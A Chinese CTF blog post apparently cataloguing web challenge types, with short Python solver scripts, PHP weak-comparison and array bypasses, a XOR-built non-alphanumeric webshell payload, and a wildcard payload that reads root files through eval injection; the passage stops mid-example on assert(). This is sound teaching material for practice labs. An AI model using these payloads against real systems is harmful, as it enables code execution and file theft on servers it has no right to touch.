<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>CTF中Web题目的常见题型及解题姿势 | CTF技术笔记</title>
  <meta name="keywords" content=" CTF ">
  <meta name="description" content="CTF中Web题目的常见题型及解题姿势 | CTF技术笔记">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="很抱歉，您所访问的地址并不存在 点击返回首页">
<meta property="og:type" content="website">
<meta property="og:title" content="404">
<meta property="og:url" content="https://sijiu.ren.com/404.html">
<meta property="og:site_name" content="CTF技术笔记">
<meta property="og:description" content="很抱歉，您所访问的地址并不存在 点击返回首页">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-04-22T09:39:41.000Z">
<meta property="article:modified_time" content="2021-03-17T03:00:59.025Z">
<meta property="article:author" content="亖 玖">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/atom-dark.css?v=1.0.1" rel="stylesheet">

<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<link href="//cdn.bootcss.com/photoswipe/4.1.2/photoswipe.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/photoswipe/4.1.2/default-skin/default-skin.min.css" rel="stylesheet">

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1" ></script>

<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>



<script src="/js/iconfont.js?v=1.0.1" ></script>

<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="CTF技术笔记" type="application/atom+xml">
</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="true">
  <input class="theme_blog_path" value="">
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>亖 玖</span>
</div>

<div class="icon">
    
        
    
        
        <a title="github" href="https://github.com/qq1012482327" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="email" href="mailto:1012482327@qq.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=1012482327&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(15)</small></div></li>
    
        
            
            <li><div data-rel="CTF">CTF<small>(5)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="运维">运维<small>(1)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a class="about  hasFriend  site_url"  href="/about">关于</a><a style="width: 50%"  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="15">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://harvey.plus/">harvey</a></li>
            
            <li><a target="_blank" href="http://www.peiqi.tech">PeiQi</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode === 13){return false;}">
        <input id="local-search-input" class="search" type="text" placeholder="以in:开头进行全文搜索" />
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CTF</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>运维</a>
            </li>
        
    </div>

</div>
    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        <a  class=""
           href="/2020/11/21/CTFweb%E7%AC%94%E8%AE%B0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CTFweb笔记">CTFweb笔记</span>
            <span class="post-date" title="2020-11-21 08:48:43">2020/11/21</span>
        </a>
        
        <a  class=""
           href="/2021/03/17/BUUweb%E7%AC%94%E8%AE%B0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="BUUweb笔记">BUUweb笔记</span>
            <span class="post-date" title="2021-03-17 14:38:32">2021/03/17</span>
        </a>
        
        <a  class="CTF "
           href="/2020/04/29/CTF%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="CTF文件上传绕过姿势">CTF文件上传绕过姿势</span>
            <span class="post-date" title="2020-04-29 21:58:56">2020/04/29</span>
        </a>
        
        <a  class="CTF "
           href="/2020/04/30/CTF%E4%B8%ADWeb%E9%A2%98%E7%9B%AE%E7%9A%84%E5%B8%B8%E8%A7%81%E9%A2%98%E5%9E%8B%E5%8F%8A%E8%A7%A3%E9%A2%98%E5%A7%BF%E5%8A%BF/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="CTF中Web题目的常见题型及解题姿势">CTF中Web题目的常见题型及解题姿势</span>
            <span class="post-date" title="2020-04-30 23:55:54">2020/04/30</span>
        </a>
        
        <a  class="CTF "
           href="/2020/06/20/CTF%E9%9A%90%E5%86%99%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="CTF隐写解题思路">CTF隐写解题思路</span>
            <span class="post-date" title="2020-06-20 12:28:58">2020/06/20</span>
        </a>
        
        <a  class=""
           href="/2021/03/16/Mac%E6%B3%9B%E6%B4%AA%E6%94%BB%E5%87%BB%E4%B8%8E%E7%9B%91%E5%90%AC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Mac泛洪攻击与监听">Mac泛洪攻击与监听</span>
            <span class="post-date" title="2021-03-16 15:02:50">2021/03/16</span>
        </a>
        
        <a  class="CTF "
           href="/2020/04/23/i-CTFer-u-should-be-a-fast-man/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="Hi,CTFer!u should be a fast man:)">Hi,CTFer!u should be a fast man:)</span>
            <span class="post-date" title="2020-04-23 00:47:14">2020/04/23</span>
        </a>
        
        <a  class=""
           href="/2020/05/31/sql%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="sql常用命令">sql常用命令</span>
            <span class="post-date" title="2020-05-31 16:24:04">2020/05/31</span>
        </a>
        
        <a  class=""
           href="/2020/10/23/sql%E6%B3%A8%E5%85%A5%E4%B9%8B%E6%98%BE%E9%94%99%E6%B3%A8%E5%85%A5/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="sql注入之显错注入">sql注入之显错注入</span>
            <span class="post-date" title="2020-10-23 10:11:16">2020/10/23</span>
        </a>
        
        <a  class=""
           href="/2020/10/21/sql%E6%B3%A8%E5%85%A5%E7%BB%83%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="sql注入练习笔记">sql注入练习笔记</span>
            <span class="post-date" title="2020-10-21 16:09:29">2020/10/21</span>
        </a>
        
        <a  class="CTF "
           href="/2020/04/27/%E5%B8%B8%E8%A7%81%E7%9A%84%E5%8A%A0%E5%AF%86%E7%B1%BB%E5%9E%8B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="常见的加密类型">常见的加密类型</span>
            <span class="post-date" title="2020-04-27 00:06:30">2020/04/27</span>
        </a>
        
        <a  class=""
           href="/2021/04/12/2021DCN%E6%9D%82%E9%A1%B9wp/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="2021DCN杂项wp">2021DCN杂项wp</span>
            <span class="post-date" title="2021-04-12 15:16:06">2021/04/12</span>
        </a>
        
        <a  class=""
           href="/2021/10/13/%E5%AD%A6%E4%B9%A0%E4%B9%A6%E7%B1%8D%E9%93%BE%E6%8E%A5/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="学习书籍链接">学习书籍链接</span>
            <span class="post-date" title="2021-10-13 22:13:06">2021/10/13</span>
        </a>
        
        <a  class=""
           href="/2021/11/27/CTF%E7%BB%83%E4%B9%A0%E9%A2%98%E7%9B%AE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CTF练习题目">CTF练习题目</span>
            <span class="post-date" title="2021-11-27 17:11:57">2021/11/27</span>
        </a>
        
        <a  class="运维 "
           href="/2022/11/02/Linux%E9%83%A8%E7%BD%B2raid%E7%A3%81%E7%9B%98%E9%98%B5%E5%88%97/"
           data-tag="运维"
           data-author="" >
            <span class="post-title" title="Linux部署raid磁盘阵列">Linux部署raid磁盘阵列</span>
            <span class="post-date" title="2022-11-02 14:52:56">2022/11/02</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-CTF中Web题目的常见题型及解题姿势" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">CTF中Web题目的常见题型及解题姿势</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a  data-rel="CTF">CTF</a>
            
        </span>
        
        
        <span class="tag">
            
            <a class="color4">CTF</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2020-05-26 18:41:44'>2020-04-30 23:55</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#基础知识类题目"><span class="toc-text">基础知识类题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#查看网页源代码"><span class="toc-text">查看网页源代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#发送HTTP请求"><span class="toc-text">发送HTTP请求</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#不常见类型的请求发送"><span class="toc-text">不常见类型的请求发送</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HTTP头相关的题目"><span class="toc-text">HTTP头相关的题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#查看相应头"><span class="toc-text">查看相应头</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#修改请求头、伪造Cookie"><span class="toc-text">修改请求头、伪造Cookie</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Git源码泄露"><span class="toc-text">Git源码泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#python爬虫信息处理"><span class="toc-text">python爬虫信息处理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP代码审计"><span class="toc-text">PHP代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP弱类型hash比较缺陷"><span class="toc-text">PHP弱类型hash比较缺陷</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数组返回NULL绕过"><span class="toc-text">数组返回NULL绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#正则表达式相关"><span class="toc-text">正则表达式相关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#命令执行漏洞"><span class="toc-text">命令执行漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS题目"><span class="toc-text">XSS题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#绕过waf"><span class="toc-text">绕过waf</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#长度限制"><span class="toc-text">长度限制</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#双写"><span class="toc-text">双写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#等价替代"><span class="toc-text">等价替代</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL编码绕过"><span class="toc-text">URL编码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux命令使用反斜杠绕过"><span class="toc-text">Linux命令使用反斜杠绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL二次解码绕过"><span class="toc-text">URL二次解码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数组绕过"><span class="toc-text">数组绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL注入"><span class="toc-text">SQL注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用sqlmap"><span class="toc-text">使用sqlmap</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p><div class='inner-toc'><h2>目录</h2><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#基础知识类题目"><span class="toc-text">基础知识类题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#查看网页源代码"><span class="toc-text">查看网页源代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#发送HTTP请求"><span class="toc-text">发送HTTP请求</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#不常见类型的请求发送"><span class="toc-text">不常见类型的请求发送</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HTTP头相关的题目"><span class="toc-text">HTTP头相关的题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#查看相应头"><span class="toc-text">查看相应头</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#修改请求头、伪造Cookie"><span class="toc-text">修改请求头、伪造Cookie</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Git源码泄露"><span class="toc-text">Git源码泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#python爬虫信息处理"><span class="toc-text">python爬虫信息处理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP代码审计"><span class="toc-text">PHP代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP弱类型hash比较缺陷"><span class="toc-text">PHP弱类型hash比较缺陷</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数组返回NULL绕过"><span class="toc-text">数组返回NULL绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#正则表达式相关"><span class="toc-text">正则表达式相关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#命令执行漏洞"><span class="toc-text">命令执行漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS题目"><span class="toc-text">XSS题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#绕过waf"><span class="toc-text">绕过waf</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#长度限制"><span class="toc-text">长度限制</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#双写"><span class="toc-text">双写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#等价替代"><span class="toc-text">等价替代</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL编码绕过"><span class="toc-text">URL编码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux命令使用反斜杠绕过"><span class="toc-text">Linux命令使用反斜杠绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL二次解码绕过"><span class="toc-text">URL二次解码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数组绕过"><span class="toc-text">数组绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL注入"><span class="toc-text">SQL注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用sqlmap"><span class="toc-text">使用sqlmap</span></a></li></ol></div></p>
<h2 id="基础知识类题目"><a href="#基础知识类题目" class="headerlink" title="基础知识类题目"></a>基础知识类题目</h2><p>考察基本的查看网页源代码、HTTP请求、修改页面元素等。</p>
<p>这些题很简单，比较难的比赛应该不会单独出，就算有因该也是Web的签到题。</p>
<p>实际做题的时候基本都是和其他更复杂的知识结合起来出现。</p>
<p>姿势：恶补基础知识就行</p>
<h2 id="查看网页源代码"><a href="#查看网页源代码" class="headerlink" title="查看网页源代码"></a>查看网页源代码</h2><p>按F12就都看到了，flag一般都在注释里，有时候注释里也会有一条hint或者是对解题有用的信息。</p>
<p>BugKu web2:<a href="http://123.222.333.12:8002/web2">http://123.222.333.12:8002/web2</a><br>BugKu web3:<a href="http://123.222.333.12:8002/web3">http://123.222.333.12:8002/web3</a></p>
<h2 id="发送HTTP请求"><a href="#发送HTTP请求" class="headerlink" title="发送HTTP请求"></a>发送HTTP请求</h2><p>可以用hackbar，有的也可以写脚本。</p>
<p>BugKu web2基础$_GET:<a href="http://123.222.333.12:8002/get/">http://123.222.333.12:8002/get/</a><br>BugKu web2基础$_POST:<a href="http://123.222.333.12:8002/post/">http://123.222.333.12:8002/post/</a><br>BugKu 点击一百万次:<a href="http://123.222.333.12:8002/test/">http://123.222.333.12:8002/test/</a></p>
<p>举个脚本的例子（题目是Bugku web基础$_POST):</p>
<pre><code>import requests
r = requests.post(&#39;http://123.222.333.12:8002/post/&#39;,data=[&#39;what&#39; : &#39;flag&#39;])
print(r.text)</code></pre><h2 id="不常见类型的请求发送"><a href="#不常见类型的请求发送" class="headerlink" title="不常见类型的请求发送"></a>不常见类型的请求发送</h2><p>以前做过一道题考OPIONS请求，可惜题目找不到了，而且那道题也不算很基础。</p>
<p>不过如果要发送这类请求，写一个脚本应该就能解决了。</p>
<h2 id="HTTP头相关的题目"><a href="#HTTP头相关的题目" class="headerlink" title="HTTP头相关的题目"></a>HTTP头相关的题目</h2><p>主要是查看和修改HTTP头。</p>
<p>目前做过的web题目有很大一部分都是与HTTP头相关的，而且这种题目也相当常见，</p>
<p>不和其他知识结合的情况下也算事属于基础题的范畴吧。</p>
<p>姿势：不同的类型有不同的利用方法，基本都离不开抓包，有些简单的也可以利用浏览器F12的网络标签解决。但是最根本的应对策略，是</p>
<p>熟悉一些常见请求头的格式、作用等，这样考题目的时候就很容易知道要怎么做了。</p>
<h2 id="查看相应头"><a href="#查看相应头" class="headerlink" title="查看相应头"></a>查看相应头</h2><p>有时候响应头里会有hint或者题目关键信息，也有时候会直接把flag放在响应头里给，但是直接查看响应头拿flag的题目不多，</p>
<p>因为太简单了。</p>
<p>知识查看的话，可以不用抓包，用F12的“网络”标签就可以解决了。</p>
<p>BugKu 头等舱:<a href="http://123.222.333.12:8002/hd.php">http://123.222.333.12:8002/hd.php</a></p>
<h2 id="修改请求头、伪造Cookie"><a href="#修改请求头、伪造Cookie" class="headerlink" title="修改请求头、伪造Cookie"></a>修改请求头、伪造Cookie</h2><p>常见的有set-cookie、XFF和Referer,总之考法很灵活，做法比较固定，知道一些常见的请求头再根据题目随机应变就没问题了。</p>
<p>有些题目还需要伪造cookie，根据题目要求做就行了。</p>
<p>可以用Burp抓包，也可以直接在浏览器的F12“网络”标签里改。</p>
<h2 id="Git源码泄露"><a href="#Git源码泄露" class="headerlink" title="Git源码泄露"></a>Git源码泄露</h2><p>flag一般在源码的某个文件里，但也有和其他知识结合、需要进一步利用的情况，比如XCTF社区的mfw这道题。</p>
<p>姿势：GitHack一把梭</p>
<h2 id="python爬虫信息处理"><a href="#python爬虫信息处理" class="headerlink" title="python爬虫信息处理"></a>python爬虫信息处理</h2><p>这类题目一般都是给一个页面，页面中有算式或者是一些数字，要求在很短的时间内求出结果并提交，如果结果正确就可以返回flag。</p>
<p>因为所给时间一般都很短而且计算比较复杂，所以只能写脚本。这种题目的脚本一般都需要用到requests库BeauifulSoup库（或者re库（正则表达式）），个人感觉使用BeautifulSoup简单一些。</p>
<p>姿势：requests库和BeautifulSoup库熟练掌握后，再多做几道题或者写几个爬虫的项目，一般这类题目就没什么问题了。主要还是对BeautifulSoup的熟练掌握，另外还需要一点点web前端（html）的知识</p>
<p>Bugku 秋名山老司机： <a href="http://123.206.87.240:8002/qiumingshan/#这道题的脚本如下，还可以继续优化" target="_blank" rel="noopener">http://123.206.87.240:8002/qiumingshan/#这道题的脚本如下，还可以继续优化</a><br>#经常出现执行了但是不弹flag的情况，多试几次就行了</p>
<pre><code>from bs4 import BeautifulSoup
import requests

r = requests.Session()
s = r.get(&quot;http://123.206.87.240:8002/qiumingshan/&quot;)
s.encoding = &#39;utf-8&#39;
text = s.text
soup = BeautifulSoup(text)
tag = soup.div
express = str(tag.string)
express = express[0 : -3]
answer = eval(express)
ans = {&quot;value&quot; : answer}
flag = r.post(&#39;http://123.206.87.240:8002/qiumingshan/&#39;, data = ans)
print(flag.text)实验吧 速度爆破： http://www.shiyanbar.com/ctf/1841</code></pre><p>HGAME2019的部分题目似乎还出现了反爬虫措施，但当时我还不会写爬虫，那一道题目也没有做，所以也不大清楚，以后如果再遇到那类题目再慢慢补上吧。</p>
<h2 id="PHP代码审计"><a href="#PHP代码审计" class="headerlink" title="PHP代码审计"></a>PHP代码审计</h2><p>代码审计覆盖面特别广，分类也很多，而且几乎什么样的比赛都会有，算是比较重要的题目类型之一吧。</p>
<p>姿势：具体问题具体分析，归根结底还是要熟练掌握PHP这门语言，了解一些常见的会造成漏洞的函数及利用方法等。</p>
<h2 id="PHP弱类型hash比较缺陷"><a href="#PHP弱类型hash比较缺陷" class="headerlink" title="PHP弱类型hash比较缺陷"></a>PHP弱类型hash比较缺陷</h2><p>这是代码审计最基础的题目了，也比较常见。</p>
<p>典型代码：</p>
<pre><code>if(md5($a) == md5($b)) {    //注意两个等号“==”
    echo $flag;
}</code></pre><p>加密函数也有可能是sha1或者其他的，但是原理都是不变的。<br>这个漏洞的原理如下：</p>
<pre><code>== 在进行比较的时候，会先将两边的变量类型转化成相同的，再进行比较。
0e在比较的时候会将其视作为科学计数法，所以无论0e后面是什么，0的多少次方还是0。</code></pre><p>所以只要让a和b在经过相应的函数加密之后都是以0e开头就可以。<br>以下是一些md5加密后开头为0e的字符串：</p>
<pre><code>QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

s1091221200a
0e940624217856561557816327384675

s1885207154a
0e509367213418206700842008763514

aabg7XSs</code></pre><p>另外，这个也可以用数组绕过，这个方法在下面会详细说。</p>
<h2 id="数组返回NULL绕过"><a href="#数组返回NULL绕过" class="headerlink" title="数组返回NULL绕过"></a>数组返回NULL绕过</h2><p>PHP绝大多数函数无法处理数组，向md5函数传入数组类型的参数会使md5()函数返回NULL（转换后为False），进而绕过某些限制。<br>如果上面的代码变成：</p>
<pre><code>if(md5($a) === md5($b)) {       //两个等号变成三个
    echo $flag;
}</code></pre><p>那么利用弱类型hash比较缺陷将无法绕过，这时可以使用数组绕过。<br><strong>传入?a[]=1&amp;b[]=2</strong> 就可以成功绕过判断。<br>这样的方法也可以用来绕过sha1()等hash加密函数相关的判断，也可以绕过正则判断，可以根据具体情况来灵活运用。</p>
<h2 id="正则表达式相关"><a href="#正则表达式相关" class="headerlink" title="正则表达式相关"></a>正则表达式相关</h2><p><strong>ereg正则%00截断</strong></p>
<p>ereg函数存在NULL截断漏洞，使用NULL可以截断过滤，所以可以使用%00截断正则匹配。</p>
<p>Bugku ereg正则%00截断：<a href="http://123.206.87.240:9009/5.php" target="_blank" rel="noopener">http://123.206.87.240:9009/5.php</a></p>
<p> 数组绕过</p>
<p>正则表达式相关的函数也可以使用数组绕过过滤，绕过方法详见数组返回NULL绕过。</p>
<p>上面那道题也可以用数组绕过。</p>
<p> 单引号绕过preg_match()正则匹配</p>
<p>在每一个字符前加上单引号可以绕过preg_match的匹配，原理暂时不明。<br>例如有如下代码：</p>
<pre><code>&lt;?php
    $p = $_GET[&#39;p&#39;];
    if (preg_match(&#39;/[0-9a-zA-Z]{2}/&#39;,$p) === 1) {
        echo &#39;False&#39;;
    } else {
        $pp = trim(base64_decode($p));
        if ($pp === &#39;flag.php&#39;) {
            echo &#39;success&#39;;
        }
    }
?&gt;</code></pre><p>payload：p=’Z’m’x’h’Z’y’5’w’a’H’A’=</p>
<p> 不含数字与字母的WebShell</p>
<p>如果题目使用preg_match()过滤掉了所有的数字和字母，但是没有过滤PHP的变量符号$，可以考虑使用这种方法。</p>
<p>典型代码：</p>
<pre><code>&lt;?php 

include&#39;flag.php&#39;; 

if(isset($_GET[&#39;code&#39;])){ 
   $code=$_GET[&#39;code&#39;]; 
   if(strlen($code)&gt;50){ 
       die(&quot;Too Long.&quot;); 
  } 
   if(preg_match(&quot;/[A-Za-z0-9_]+/&quot;,$code)){ 
       die(&quot;Not Allowed.&quot;); 
  } 
   @eval($code); 
}else{ 
   highlight_file(__FILE__); 
} 
//$hint = &quot;php function getFlag() to get flag&quot;; 
?&gt;</code></pre><p>这种方法的核心是字符串的异或操作。</p>
<p>爆破脚本：</p>
<pre><code>chr1 = [&#39;@&#39;, &#39;!&#39;, &#39;&quot;&#39;, &#39;#&#39;, &#39;$&#39;, &#39;%&#39;, &#39;&amp;&#39;, &#39;\&#39;&#39;, &#39;(&#39;, &#39;)&#39;, &#39;*&#39;, &#39;+&#39;, &#39;,&#39;, &#39;-&#39;, &#39;.&#39;, &#39;/&#39;, &#39;:&#39;, &#39;;&#39;, &#39;&lt;&#39;, &#39;=&#39;, &#39;&gt;&#39;, &#39;?&#39;, &#39;[&#39;, &#39;\\&#39;, &#39;]&#39;, &#39;^&#39;, &#39;_&#39;, &#39;`&#39;, &#39;{&#39;, &#39;|&#39;, &#39;}&#39;, &#39;~&#39;]
chr2 = [&#39;@&#39;, &#39;!&#39;, &#39;&quot;&#39;, &#39;#&#39;, &#39;$&#39;, &#39;%&#39;, &#39;&amp;&#39;, &#39;\&#39;&#39;, &#39;(&#39;, &#39;)&#39;, &#39;*&#39;, &#39;+&#39;, &#39;,&#39;, &#39;-&#39;, &#39;.&#39;, &#39;/&#39;, &#39;:&#39;, &#39;;&#39;, &#39;&lt;&#39;, &#39;=&#39;, &#39;&gt;&#39;, &#39;?&#39;, &#39;[&#39;, &#39;\\&#39;, &#39;]&#39;, &#39;^&#39;, &#39;_&#39;, &#39;`&#39;, &#39;{&#39;, &#39;|&#39;, &#39;}&#39;, &#39;~&#39;]

for i in chr1 :
    for j in chr2 :
        print(i + &#39;xor&#39; + j + &#39;=&#39; + (chr(ord(i) ^ ord(j))))</code></pre><p>根据题目的要求，用异或出来的字符串拼出合适的Payload，并放在PHP变量中执行。变量名可以用中文。<br>比如这道题的Payload：?code=$啊=”@@^|@@@”^”‘%*:,!’”;$啊();</p>
<p>Linux通配符绕过正则匹配</p>
<p>典型代码如下，与前一种题目非常相似，但也不大一样：</p>
<pre><code>&lt;?php 

if(isset($_GET[&#39;code&#39;])){ 
   $code=$_GET[&#39;code&#39;]; 
   if(strlen($code)&gt;50){ 
       die(&quot;Too Long.&quot;); 
  } 
   if(preg_match(&quot;/[A-Za-z0-9_$]+/&quot;,$code)){ 
       die(&quot;Not Allowed.&quot;); 
  } 
   @eval($code); 
}else{ 
   highlight_file(__FILE__); 
} 
//flag in / 
?&gt; </code></pre><p>最主要的区别就是过滤了$和_，也就是说无法使用变量符号$了。<br>这时候可以考虑采用通配符绕过。<br>通配符有点像正则表达式，有自己的匹配规则，看这张图：</p>
<p><img src="http://cdn.sijiu.ren/blog/20200501/J28x2Wmxqnal.bmp" alt></p>
<p>所以构造一下通配符就是/???/??? /<em>。<br>因为过滤了变量符号，没法通过上面那种方法来执行了。但是，可以通过闭合PHP标记来执行，也就是：?&gt;&lt;?=/???/??? /</em>?&gt;（/bin/cat /<em>）。<br>所以本题的payload为：?code=?&gt;&lt;?=/???/??? /</em>?&gt;<br>具体解法可以参照此篇文章的前两道题目：<a href="https://www.jianshu.com/p/ecc2414ec110" target="_blank" rel="noopener">https://www.jianshu.com/p/ecc2414ec110</a></p>
<h2 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h2><p> assert()函数引起的命令执行</p>
<p>ssert函数的参数为字符串时，会将字符串当做PHP命令来执行。<br>例如：assert(‘phpinfo()’)相当于执行<?php phpinfo() ?><br>以一道题目为例：<br>本题目中题目文件夹下放置了一个隐藏的flag文件。</p>
<pre><code>&lt;?php
error_reporting(0);
if (isset($_GET[&#39;file&#39;])) {
    if($_GET[&#39;file&#39;] === &quot;flag&quot;){
        highlight_file(&quot;flag.php&quot;);
    }else{
        $page = $_GET[&#39;file&#39;];
    }
} else {
    $page = &quot;./flag.php&quot;;
}

assert(&quot;file_exists(&#39;$page&#39;)&quot;);
